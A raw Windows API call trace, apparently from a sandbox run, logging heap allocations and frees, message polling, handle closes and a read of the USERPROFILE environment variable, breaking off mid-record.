PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0256.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0256.351] FreeLibrary (hLibModule=0x74d40000) returned 1 [0256.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.351] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.351] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0256.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.351] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0256.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0256.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0256.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0256.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0e0 [0256.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0256.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0256.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0256.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0256.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0256.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0256.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0256.353] CloseHandle (hObject=0x2cc) returned 1 [0256.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0256.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0256.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0256.354] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0256.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0256.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0256.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0256.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0256.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0256.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0256.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0256.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.356] CloseHandle (hObject=0x1f8) returned 1 [0256.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0256.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0256.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0256.359] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0256.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0256.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0256.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0256.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0256.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0256.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0256.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0256.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0256.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0256.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0256.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0256.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0256.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0256.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0256.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0256.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0256.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0256.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0256.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0256.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0256.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0256.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0256.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0256.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0256.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0256.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0256.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0256.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0256.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0256.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0256.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0256.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0256.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0256.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0256.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0256.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0256.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0256.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0256.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0256.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0256.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0256.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0256.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0256.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0256.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0256.364] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0256.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0256.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0256.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0256.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0256.365] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0256.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab310 [0256.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0256.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f90 [0256.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0256.365] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0256.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0256.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0256.365] HeapFree (in: 